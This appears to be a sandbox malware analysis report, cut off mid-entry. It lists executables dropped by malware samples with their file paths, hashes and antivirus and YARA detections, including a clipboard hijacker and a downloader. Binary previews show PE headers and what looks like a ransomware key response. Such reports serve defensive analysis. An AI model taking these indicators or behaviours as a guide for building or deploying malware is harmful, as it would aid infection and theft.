Preview:	<rootb.D.v...E....l9..jX.m#L..W!?......5.<.@$Y..V.}?..NuS.B........0.3'...t....L.....I..-!...X...<.E.[l......O..v.......S$j.B.G..(...I$.m.n...N... @..g..)!u.m.Q<2.gl@.M)..;....v.....Qr.8..L..?...M.k.b...L...P...ckz...b}... .K......f..-.U.g.p.....E...O.Z....5._.<....i.'z.r'T.B,Hr....~:xF.\7m.gk.....b.A[....8.......n...kn.....;..<.K..C-+j......8..+s...i.).7G)R.){.e..`..A........>G,...F.k..*..+..b.%.S...%~!.f..lfyRgbm7aZ5zpjJggzyGva9vFH6Xpmk3xwjgrUmT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\WP4N5YVD\contextual.media[1].xml

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	500
Entropy (8bit):	7.526070700095003
Encrypted:	false
SSDEEP:	12:GE5M5pZrOXLG0/mm6YndoQpI8lDL2d3bMfr7fnWcii9a:NKpZrhW4YndbpI8U5ofvnWbD
MD5:	99664E2F5F13C6477AFBC79A8CC571BB
SHA1:	3DB7B881A24D6367B3E638DAA91B192D38398A77
SHA-256:	93CEADDAF7AEAA91D073AD0790C0F151E024FAE4D9B56FD96E743BAD533A8373
SHA-512:	8AC9D35F901251CF1A55291AC345D9D340BF4EF5114946DF668042DA6E963A7E2FCE78498BF336948C2D536A1453DAF68EF75BCB3AB19955899E8BE231D74DC2
Malicious:	false
Preview:	<root...: [.y ..Z...o+.m..yx.:...i.q..:..hP..._VO.y.<.C!.......oJ..H>w.d.x..{.WN!..6..~B.... 3*......yC.D,.J..5..'=..yn...C...EW.K.u.{>/...H..t......O..Kf..:..j.kKO5.3.Z.qr.k.[.P.......'.:..lA{+....,..g..]..M.z.g.%.~....q......]w.^.U._I....'..SJ#.&...}.'M..k...m.....kb.._j...0...q.........{.n..@...~1<....W.Y.&+V.S.....J.:....V.&g..9\.w....O...&..fw...$...X2$.E......by.u...X....b$.+.....,q_....J=H%....aq.lfyRgbm7aZ5zpjJggzyGva9vFH6Xpmk3xwjgrUmT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\WP4N5YVD\contextual.media[1].xml.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	500
Entropy (8bit):	7.526070700095003
Encrypted:	false
SSDEEP:	12:GE5M5pZrOXLG0/mm6YndoQpI8lDL2d3bMfr7fnWcii9a:NKpZrhW4YndbpI8U5ofvnWbD
MD5:	99664E2F5F13C6477AFBC79A8CC571BB
SHA1:	3DB7B881A24D6367B3E638DAA91B192D38398A77
SHA-256:	93CEADDAF7AEAA91D073AD0790C0F151E024FAE4D9B56FD96E743BAD533A8373
SHA-512:	8AC9D35F901251CF1A55291AC345D9D340BF4EF5114946DF668042DA6E963A7E2FCE78498BF336948C2D536A1453DAF68EF75BCB3AB19955899E8BE231D74DC2
Malicious:	false
Preview:	<root...: [.y ..Z...o+.m..yx.:...i.q..:..hP..._VO.y.<.C!.......oJ..H>w.d.x..{.WN!..6..~B.... 3*......yC.D,.J..5..'=..yn...C...EW.K.u.{>/...H..t......O..Kf..:..j.kKO5.3.Z.qr.k.[.P.......'.:..lA{+....,..g..]..M.z.g.%.~....q......]w.^.U._I....'..SJ#.&...}.'M..k...m.....kb.._j...0...q.........{.n..@...~1<....W.Y.&+V.S.....J.:....V.&g..9\.w....O...&..fw...$...X2$.E......by.u...X....b$.+.....,q_....J=H%....aq.lfyRgbm7aZ5zpjJggzyGva9vFH6Xpmk3xwjgrUmT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\YU3ONM33\www.microsoft[1].xml

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	570
Entropy (8bit):	7.59205843169011
Encrypted:	false
SSDEEP:	12:wJSjaM5yqIQj9xRLvF5fyb22YN7abf2Nls1gJF/aZ92KLWcii9a:wcjaWyqIQjBjF462s7ef+lsSQvWbD
MD5:	1360986DEBFB167F736BFC54F2C6C297
SHA1:	C1201001076402B045CB435CA32CB92FDD263556
SHA-256:	A730EA5A536C85B8510F5C734EE5A900CE79748C5C29AD031AD22B9A2A2CCBEE
SHA-512:	A9333787249BFFA59D976456E20EB0BF2DB0B8E453982F1899F47036F8C41316C2570F92CD2EC1049F4862CC4EE54B83B0FE08F0A8C98EEC6D43244033BCB32B
Malicious:	false
Preview:	<root.8.B..A..Z.<w.kaF...E{%hx..q...d.o.k..G...l.])....>......!...9......a..&.........._.v8......Oq..z..oBG...H6b..o......6OE....UD.XG.....k.._..&@...}Y.H...`....reF.........`p_........)A.#)......i7Zh'........5......Wz..}*....."........hSm.k.4.%...xkG..f .#N....t....NPf..;\..c..!.D..9....Tn..>.....h..Z...P.d..B....P.1..$..m_..Q.....".B..B...3..M#.t...$\.;...:...u.Ni-q.....#.#..qAIq.C..l.D.,l....m....=.!>T...4;.t....B..1J"Mn......>=.k..h..g$.h...z-&. ?.L.G....e.lfyRgbm7aZ5zpjJggzyGva9vFH6Xpmk3xwjgrUmT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\YU3ONM33\www.microsoft[1].xml.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	570
Entropy (8bit):	7.59205843169011
Encrypted:	false
SSDEEP:	12:wJSjaM5yqIQj9xRLvF5fyb22YN7abf2Nls1gJF/aZ92KLWcii9a:wcjaWyqIQjBjF462s7ef+lsSQvWbD
MD5:	1360986DEBFB167F736BFC54F2C6C297
SHA1:	C1201001076402B045CB435CA32CB92FDD263556
SHA-256:	A730EA5A536C85B8510F5C734EE5A900CE79748C5C29AD031AD22B9A2A2CCBEE
SHA-512:	A9333787249BFFA59D976456E20EB0BF2DB0B8E453982F1899F47036F8C41316C2570F92CD2EC1049F4862CC4EE54B83B0FE08F0A8C98EEC6D43244033BCB32B
Malicious:	false
Preview:	<root.8.B..A..Z.<w.kaF...E{%hx..q...d.o.k..G...l.])....>......!...9......a..&.........._.v8......Oq..z..oBG...H6b..o......6OE....UD.XG.....k.._..&@...}Y.H...`....reF.........`p_........)A.#)......i7Zh'........5......Wz..}*....."........hSm.k.4.%...xkG..f .#N....t....NPf..;\..c..!.D..9....Tn..>.....h..Z...P.d..B....P.1..$..m_..Q.....".B..B...3..M#.t...$\.;...:...u.Ni-q.....#.#..qAIq.C..l.D.,l....m....=.!>T...4;.t....B..1J"Mn......>=.k..h..g$.h...z-&. ?.L.G....e.lfyRgbm7aZ5zpjJggzyGva9vFH6Xpmk3xwjgrUmT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\D5B9.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\D5B9.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	425
Entropy (8bit):	5.340009400190196
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhav:ML9E4Ks2wKDE4KhK3VZ9pKhk
MD5:	CC144808DBAF00E03294347EADC8E779
SHA1:	A3434FC71BA82B7512C813840427C687ADDB5AEA
SHA-256:	3FC7B9771439E777A8F8B8579DD499F3EB90859AD30EFD8A765F341403FC7101
SHA-512:	A4F9EB98200BCAF388F89AABAF7EA57661473687265597B13192C24F06638C6339A3BD581DF4E002F26EE1BA09410F6A2BBDB4DA0CD40B59D63A09BAA1AADD3D
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\build2[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	348672
Entropy (8bit):	7.184133278122481
Encrypted:	false
SSDEEP:	6144:Rre2Ofp8rQ5BJiHnx/PFy0nrFh4QtcOE1+GayRx9K4o78EZm:Ri1f+8jJSty07sp7HJ+
MD5:	B7133C4070082747C60BF6191A5F70DE
SHA1:	A7568A93D9DC79A211270736C5989C5F6635E9B6
SHA-256:	A96E080EE195FB2333191FB38C7A66E0C0BD029AF6480DC489A8C8113E5B03A9
SHA-512:	F3DD85289894E9DDFD61D1D5B5CB479B97D7E0759327236B72150D22B790A2492BD4929D8427AAC50B48ED6E7E18ABCCBE401CB7D5F5DEB683E8C813AFBB72FE
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 58%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: UAZA81FNVU.exe, Detection: malicious, Browse Filename: 53YeqvGGT5.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e..e!.6!.6!.6..'6 .6N.!65.6N..6N.6N..6..6(.,6".6!.6].6N..6 .6N.%6 .6N."6 .6Rich!.6........................PE..L...i..c.................>....t......R.......P....@..........................`u.............................................DB..(....`t.x............................................................4..@............................................text....<.......>.................. ..`.data...8.r..P.......B..............@....wida........@t......>..............@....rsrc...x....`t......V..............@..@........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\build3[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	9728
Entropy (8bit):	5.3362059272001
Encrypted:	false
SSDEEP:	192:9UEc8b6H1LE+4LoGgMatAJ2lzUw317NyEpvNHhqyo:9UUE1BYoGza/D3170kiyo
MD5:	9EAD10C08E72AE41921191F8DB39BC16
SHA1:	ABE3BCE01CD34AFC88E2C838173F8C2BD0090AE1
SHA-256:	8D7F0E6B6877BDFB9F4531AFAFD0451F7D17F0AC24E2F2427E9B4ECC5452B9F0
SHA-512:	AA35DBC59A3589DF2763E76A495CE5A9E62196628B4C1D098ADD38BD7F27C49EDF93A66FB8507FB746E37EE32932DA2460E440F241ABE1A5A279ABCC1E5FFE4A
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\build3[1].exe, Author: Joe Security Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\build3[1].exe, Author: unknown Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\build3[1].exe, Author: unknown
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 88%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................................o......o......Rich...........................PE..L......a.....................................0....@..........................`............@..................................:..<............................P..,....9..8............................................0..0............................text............................... ..`.rdata.......0......................@..@.data...`....@......................@....reloc..,....P......."..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\get[1].htm

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	559
Entropy (8bit):	6.004259360523156
Encrypted:	false
SSDEEP:	12:YGJ68UMQMuFhwufi+Cv2OHbW2/lBtrYrHw0J/6X+yN55z:YgJURMChni1v2OHbWGls6X+yzh
MD5:	E085EE40110A62687426D9912F76BA0A
SHA1:	570129022D1257B25E4E41179B1FCE484E35E173
SHA-256:	249D09D2B2F601F13AEC42E8C656C5612F0400477C724CB6E8A6D26EEC845D57
SHA-512:	F3088B4637A73FF917318930CB9F69FA7CF9ACB2924E8A001C20A502461DED42A2BE035BF16792274A2F5486539544CFE2C1EE1A997623788545195CAB7ACD4F
Malicious:	false
Preview:	{"public_key":"-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAz6fKeRUzAuT51Jzl25x1\\n6rIH8kP+Za9iV6o7RJzhAukJBNh9iYpD3z0BRtUYY7G4lSqjMRJHR1eReiKKJE5D\\nwyflo\/4NUlBJ5QA4zFAamyP3ajU0BVX3dse65p5r7K7wALsdMLsXg+x8YRkQSBVr\\nQPROSOgYJZmDe+9g5QdWb40\/vPP+oKyceFvfPiWyf6tzEwOzihxGQDJ1ZghRh3Si\\nFMLoHm8blxwJ3u3xq6lhIsaZNJ1aX\/RbynaXSz6NU3VpFSgC00CoYAYPHcVY6aWe\\nj+iMeY\/mLAYeK\/rE8JZxbksETfAU3HEiN7S7k6clRlzwmkVfSwE6epDUR4dzTQUF\\nYQIDAQAB\\n-----END PUBLIC KEY-----\\n","id":"lfyRgbm7aZ5zpjJggzyGva9vFH6Xpmk3xwjgrUmT"}

C:\Users\user\AppData\Local\Temp\11.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	205824
Entropy (8bit):	6.931250470043805
Encrypted:	false
SSDEEP:	3072:J4BPQ70VHgRVgdytD1rtn6ZQax9x7XiQPuhNR6aHInh:OhdHgRVs+D5k6aJimtaHu
MD5:	B1C532EE300B4D54DC95FA6DE7406870
SHA1:	364A17284E19AFDCE1D3C198448301CCBDAC59B7
SHA-256:	BE85B76A48B35552D8339B383CCD2B27B3A685370DEE6B466EA79C580E1DB68E
SHA-512:	C6E4A191AFC783CDEB5DD5ADDF5E183898C1A249E2EA243961C92DEED85D649D594790033F6ABDC76B75DE3B504AC7DC086D77EDDF6EA96E7F5CEB438DA06828
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.....i...i...i.......i....3.i....e.i.$>....i...h...i......i.......i.......i.Rich..i.........................PE..L...K..b.................B..........~\.......`....@.........................................................................pF..d....P...z......................@...0................................2..@............................................text...2A.......B.................. ..`.data...`....`...@...F..............@....rsrc....z...P...\|..................@..@.reloc... ......."..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\6000.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	796672
Entropy (8bit):	7.825539770742405
Encrypted:	false
SSDEEP:	12288:USE30OgjpRS5tgX60lgX9V4h7FBVbOxyp8tgzW2bfJLxMks:A30OgjpAUKYpRBWWzW2zEk
MD5:	836FDB5D06415C4815B4962D5C5316A5
SHA1:	E353907271F8192C1B27019B416A2D8405BF4376
SHA-256:	6D30A028003763CC6DEA64EFA67B8CE750E489434BA44EE8C156CF3941F546E1
SHA-512:	D469CF354FD0EDE245FB2EB98890866114E5617961E9A2C9D8FB9200FA4E36E84009F8BEA88240FC52705A19E0BC9869BA23278B9654C015E8C6261364372373
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.....i...i...i.......i....3.i....e.i.$>....i...h...i......i.......i.......i.Rich..i.........................PE..L......a.................h...`....................@..................................d.......................................i..d....@...z...................... ....................................?..@...............0............................text...pf.......h.................. ..`.data...h............l..............@....rsrc....z...@...\|..................@..@.reloc...%.......&..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\67F2.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	205824
Entropy (8bit):	6.931250470043805
Encrypted:	false
SSDEEP:	3072:J4BPQ70VHgRVgdytD1rtn6ZQax9x7XiQPuhNR6aHInh:OhdHgRVs+D5k6aJimtaHu
MD5:	B1C532EE300B4D54DC95FA6DE7406870
SHA1:	364A17284E19AFDCE1D3C198448301CCBDAC59B7
SHA-256:	BE85B76A48B35552D8339B383CCD2B27B3A685370DEE6B466EA79C580E1DB68E
SHA-512:	C6E4A191AFC783CDEB5DD5ADDF5E183898C1A249E2EA243961C92DEED85D649D594790033F6ABDC76B75DE3B504AC7DC086D77EDDF6EA96E7F5CEB438DA06828
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.....i...i...i.......i....3.i....e.i.$>....i...h...i......i.......i.......i.Rich..i.........................PE..L...K..b.................B..........~\.......`....@.........................................................................pF..d....P...z......................@...0................................2..@............................................text...2A.......B.................. ..`.data...`....`...@...F..............@....rsrc....z...P...\|..................@..@.reloc... ......."..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\6C74.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	796672
Entropy (8bit):	7.825539770742405
Encrypted:	false
SSDEEP:	12288:USE30OgjpRS5tgX60lgX9V4h7FBVbOxyp8tgzW2bfJLxMks:A30OgjpAUKYpRBWWzW2zEk
MD5:	836FDB5D06415C4815B4962D5C5316A5
SHA1:	E353907271F8192C1B27019B416A2D8405BF4376
SHA-256:	6D30A028003763CC6DEA64EFA67B8CE750E489434BA44EE8C156CF3941F546E1
SHA-512:	D469CF354FD0EDE245FB2EB98890866114E5617961E9A2C9D8FB9200FA4E36E84009F8BEA88240FC52705A19E0BC9869BA23278B9654C015E8C6261364372373
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.....i...i...i.......i....3.i....e.i.$>....i...h...i......i.......i.......i.Rich..i.........................PE..L......a.................h...`....................@..................................d.......................................i..d....@...z...................... ....................................?..@...............0............................text...pf.......h.................. ..`.data...h............l..............@....rsrc....z...@...\|..................@..@.reloc...%.......&..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\759F.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	796672
Entropy (8bit):	7.825539770742405
Encrypted:	false
SSDEEP:	12288:USE30OgjpRS5tgX60lgX9V4h7FBVbOxyp8tgzW2bfJLxMks:A30OgjpAUKYpRBWWzW2zEk
MD5:	836FDB5D06415C4815B4962D5C5316A5
SHA1:	E353907271F8192C1B27019B416A2D8405BF4376
SHA-256:	6D30A028003763CC6DEA64EFA67B8CE750E489434BA44EE8C156CF3941F546E1
SHA-512:	D469CF354FD0EDE245FB2EB98890866114E5617961E9A2C9D8FB9200FA4E36E84009F8BEA88240FC52705A19E0BC9869BA23278B9654C015E8C6261364372373
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.....i...i...i.......i....3.i....e.i.$>....i...h...i......i.......i.......i.Rich..i.........................PE..L......a.................h...`....................@..................................d.......................................i..d....@...z...................... ....................................?..@...............0............................text...pf.......h.................. ..`.data...h............l..............@....rsrc....z...@...\|..................@..@.reloc...%.......&..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\86ED.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	818176
Entropy (8bit):	7.536777986846827
Encrypted:	false
SSDEEP:	12288:JFu1Aol4oRVL+O4wI6pig+Nz0a1DMyw0Se1bf0dcF4nRtInoTV0PYEoNSAiyGYKH:a1A/AVqHU63DSI7F4vIoB0LoNSAnGBb
MD5:	975AFF0E2D4CC02478D7ED11A94354FD
SHA1:	27C50BCACD22867323774CEA8EDF1AF8852A13B7
SHA-256:	102DFB05D9EB0F0083048CACEE05E7F84B5D7D2EAA49D52891C7407ABD3D71D6
SHA-512:	5C1A3F58A860A0AF062FEF663A8DDC946E27F23FB96B3B29DCD020DA07A1AF9549C17031976E082A0232FA97AF44DE3CA4B391AA2600717EDCDD12550489EBA2
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........B...B...B...\.E.S...\.T.h...\.S.....e...K...B.......\.Z.C...\.D.C...\.A.C...RichB...........PE..L...%ngb......................P......[............@...........................Z......}..........................................d....pX.......................Z......................................2..@............................................text............................... ..`.data....dN......>..................@....rsrc........pX......*..............@..@.reloc..(O....Z..P...,..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\9B15.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	818176
Entropy (8bit):	7.536777986846827
Encrypted:	false
SSDEEP:	12288:JFu1Aol4oRVL+O4wI6pig+Nz0a1DMyw0Se1bf0dcF4nRtInoTV0PYEoNSAiyGYKH:a1A/AVqHU63DSI7F4vIoB0LoNSAnGBb
MD5:	975AFF0E2D4CC02478D7ED11A94354FD
SHA1:	27C50BCACD22867323774CEA8EDF1AF8852A13B7
SHA-256:	102DFB05D9EB0F0083048CACEE05E7F84B5D7D2EAA49D52891C7407ABD3D71D6
SHA-512:	5C1A3F58A860A0AF062FEF663A8DDC946E27F23FB96B3B29DCD020DA07A1AF9549C17031976E082A0232FA97AF44DE3CA4B391AA2600717EDCDD12550489EBA2
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........B...B...B...\.E.S...\.T.h...\.S.....e...K...B.......\.Z.C...\.D.C...\.A.C...RichB...........PE..L...%ngb......................P......[............@...........................Z......}..........................................d....pX.......................Z......................................2..@............................................text............................... ..`.data....dN......>..................@....rsrc........pX......*..............@..@.reloc..(O....Z..P...,..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\AF5C.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	818176
Entropy (8bit):	7.536777986846827
Encrypted:	false
SSDEEP:	12288:JFu1Aol4oRVL+O4wI6pig+Nz0a1DMyw0Se1bf0dcF4nRtInoTV0PYEoNSAiyGYKH:a1A/AVqHU63DSI7F4vIoB0LoNSAnGBb
MD5:	975AFF0E2D4CC02478D7ED11A94354FD
SHA1:	27C50BCACD22867323774CEA8EDF1AF8852A13B7
SHA-256:	102DFB05D9EB0F0083048CACEE05E7F84B5D7D2EAA49D52891C7407ABD3D71D6
SHA-512:	5C1A3F58A860A0AF062FEF663A8DDC946E27F23FB96B3B29DCD020DA07A1AF9549C17031976E082A0232FA97AF44DE3CA4B391AA2600717EDCDD12550489EBA2
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........B...B...B...\.E.S...\.T.h...\.S.....e...K...B.......\.Z.C...\.D.C...\.A.C...RichB...........PE..L...%ngb......................P......[............@...........................Z......}..........................................d....pX.......................Z......................................2..@............................................text............................... ..`.data....dN......>..................@....rsrc........pX......*..............@..@.reloc..(O....Z..P...,..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\C2B9.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	205824
Entropy (8bit):	6.931250470043805
Encrypted:	false
SSDEEP:	3072:J4BPQ70VHgRVgdytD1rtn6ZQax9x7XiQPuhNR6aHInh:OhdHgRVs+D5k6aJimtaHu
MD5:	B1C532EE300B4D54DC95FA6DE7406870
SHA1:	364A17284E19AFDCE1D3C198448301CCBDAC59B7
SHA-256:	BE85B76A48B35552D8339B383CCD2B27B3A685370DEE6B466EA79C580E1DB68E
SHA-512:	C6E4A191AFC783CDEB5DD5ADDF5E183898C1A249E2EA243961C92DEED85D649D594790033F6ABDC76B75DE3B504AC7DC086D77EDDF6EA96E7F5CEB438DA06828
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.....i...i...i.......i....3.i....e.i.$>....i...h...i......i.......i.......i.Rich..i.........................PE..L...K..b.................B..........~\.......`....@.........................................................................pF..d....P...z......................@...0................................2..@............................................text...2A.......B.................. ..`.data...`....`...@...F..............@....rsrc....z...P...\|..................@..@.reloc... ......."..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\D5B9.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4531200
Entropy (8bit):	7.888380542499624
Encrypted:	false
SSDEEP:	98304:jUu64pByjFQ/1m2L4PkWjvsj9cSFzIcNO:TByJqm7Yc2zf
MD5:	4E40E00BE3370FB1F562B1E09E1275C1
SHA1:	083D017B2A7D25E643FFB14E81A49AFCC5E27470
SHA-256:	8A2E061B3B38DFF83F62982A6B0087E5C4EA1C47192BF0AC2F8F67397636B164
SHA-512:	94C7B158B3300B5AFA9128F30B62946775698E4C33518BDA2369A8737685F4016BC6C033F0096238876C909260A7FE92B1D79C953E357D1BBFB3BF9A950CF082
Malicious:	true
Yara Hits:	Rule: MALWARE_Win_DLInjector04, Description: Detects downloader / injector, Source: C:\Users\user\AppData\Local\Temp\D5B9.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 75%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.d..................E..........8E.. ...@E...@.. ........................E...........@.................................P8E.K....@E......................`E...................................................... ............... ..H............text.....E.. ....E................. ..`.rsrc........@E.......E.............@..@.reloc.......`E......"E.............@..B.................8E.....H........"E.\............'....D..........................................0.._.......~....,.(....,..(....~....,.(....,..(....~....,.(....,..(....~....,.(....,..(....~....,.~.... ....Z(....~....,.r...pr...p.(....&..8....~.....o.....~.....o.....~.....o.....~.....o.......(......~....,...(......~....r...p(....,.(....r...po......(......+)~....r1..p(....,...(....r...po....(..........(....(..........(.......(......X..~....o....?....~....&*..0../........s.....s.......s.......o.......,

C:\Users\user\AppData\Local\Temp\DF46.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	818176
Entropy (8bit):	7.536777986846827
Encrypted:	false
SSDEEP:	12288:JFu1Aol4oRVL+O4wI6pig+Nz0a1DMyw0Se1bf0dcF4nRtInoTV0PYEoNSAiyGYKH:a1A/AVqHU63DSI7F4vIoB0LoNSAnGBb
MD5:	975AFF0E2D4CC02478D7ED11A94354FD
SHA1:	27C50BCACD22867323774CEA8EDF1AF8852A13B7
SHA-256:	102DFB05D9EB0F0083048CACEE05E7F84B5D7D2EAA49D52891C7407ABD3D71D6
SHA-512:	5C1A3F58A860A0AF062FEF663A8DDC946E27F23FB96B3B29DCD020DA07A1AF9549C17031976E082A0232FA97AF44DE3CA4B391AA2600717EDCDD12550489EBA2
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........B...B...B...\.E.S...\.T.h...\.S.....e...K...B.......\.Z.C...\.D.C...\.A.C...RichB...........PE..L...%ngb......................P......[............@...........................Z......}..........................................d....pX.......................Z......................................2..@............................................text............................... ..`.data....dN......>..................@....rsrc........pX......*..............@..@.reloc..(O....Z..P...,..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\E8B1.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	818176
Entropy (8bit):	7.536777986846827
Encrypted:	false
